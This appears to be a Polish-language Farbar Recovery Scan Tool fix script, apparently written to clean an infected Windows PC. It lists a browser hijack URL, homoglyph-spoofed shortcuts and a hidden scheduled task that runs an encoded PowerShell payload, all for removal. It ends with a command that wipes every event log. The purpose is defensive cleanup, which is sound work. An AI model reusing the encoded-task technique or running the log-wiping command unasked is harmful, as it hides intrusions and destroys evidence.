CloseProcesses:
CreateRestorePoint:
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <==== UWAGA
HKU\S-1-5-21-54286028-2577319502-3764889771-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://page-ups.com/all/
SearchScopes: HKU\S-1-5-21-54286028-2577319502-3764889771-1001 -> {36BC4DEB-BA1C-4097-A3E4-24EBA7CA8C05} URL = 
Edge Extension: (NAZWA) -> hdokiejnpimakedhajhdlcegeplioahd_LastPassLastPassFreePasswordManager_qq0fmhteeht3j => C:\Program Files\WindowsApps\LastPass.LastPassFreePasswordManager_4.1.45.0_neutral__qq0fmhteeht3j [nie znaleziono]
FF Plugin HKU\S-1-5-21-54286028-2577319502-3764889771-1001: ubisoft.com/uplaypc -> E:\The Settlers 7\Data\Base\_Dbg\Bin\Release\orbit\npuplaypc.dll [Brak pliku]
CHR HomePage: Profile 1 -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwYO55w-ZXGxCsKvUNFFjKh47-ylI-LOMzQJoQicREwhKaFUuqEKZpQJ3mUec8Neuz6vQn5WBJMMpiY-1JVlzYE60vvVEqkcDF1zJu9U6t4XzVXC_Hwkrys-5AaEHw16sWJRjZYIQuIxfoRbo
CHR DefaultSearchKeyword: Profile 1 -> lp
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx
S3 BcastDVRUserService_5611c; C:\WINDOWS\system32\svchost.exe [46600 2018-02-12] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL)
S3 BcastDVRUserService_5611c; C:\WINDOWS\SysWOW64\svchost.exe [40344 2018-02-12] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL)
S3 BluetoothUserService_5611c; C:\WINDOWS\system32\svchost.exe [46600 2018-02-12] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL)
S3 BluetoothUserService_5611c; C:\WINDOWS\SysWOW64\svchost.exe [40344 2018-02-12] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL)
2018-02-18 19:03 - 2018-02-18 19:03 - 000578560 _____ C:\Users\damia\31mEyUlINt4M8cB2ed.exe
2018-02-12 07:01 - 2018-02-12 07:01 - 009065472 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2018-02-12 07:01 - 2018-02-12 07:01 - 006632448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2018-02-12 07:01 - 2018-02-12 07:01 - 000943616 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2018-02-12 07:01 - 2018-02-12 07:01 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll
2018-02-12 07:01 - 2018-02-12 07:01 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingASDS.dll
2018-02-12 07:01 - 2018-02-12 07:01 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingFilterDS.dll
2018-02-18 19:03 - 2018-02-18 19:03 - 000578560 _____ () C:\Users\damia\31mEyUlINt4M8cB2ed.exe
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
Task: {BFDB8C07-05D9-4C63-8A37-DBA8E62D8E9D} - \Microsoft\Windows\UNP\Campaigns\{3D2E6D6C-D655-43CB-B39B-D2B876D9E480}\ExperienceTargeted\Logon -> Brak pliku <==== UWAGA
Task: {F141CBB8-9961-44AF-9A82-D827FA6A5FFD} - System32\Tasks\{0A0B0A47-0C0B-0D04-0911-0F0C7A041105} => C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAIAA7ADsAIAA7ACAAOwA7ADsAIAA7ACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (dane wartości zawierają 10048 znaków więcej). <==== UWAGA
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Вrothеr Utilities.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Ерiс Games Lаunchеr.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Explоrer.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhromе.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gоogle Сhrоme.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Gооgle Сhrоmе.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ерiс Games Launchеr.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ерiс Games Launchеr.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brother\Вrоthеr Utilities.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Euro Truck Simulator 2.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Gaming Mouse.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Sid Meiers Civilization VI Khmer and Indonesia Civilization and Scenario Pack.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\The Witcher 3 - Wild Hunt.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Train Sim World - CSX Heavy Haul.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Twitch.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\WhatsApp.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Вrothеr Utilities.lnk
C:\Users\damia\Desktop\SKRÓTY DO APLIKACJI\Ерiс Games Lаunchеr.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lenovo App Explorer.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Explоrer.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhromе.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gоogle Сhrоme.lnk
C:\Users\damia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Gооgle Сhrоmе.lnk
InternetURL: C:\Users\damia\Favorites\Bing.url -> URL: hxxp://go.microsoft.com/fwlink/p/?LinkId=255142
C:\WINDOWS\system32\default_error_stack-*.txt
EmptyTemp:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
RemoveProxy: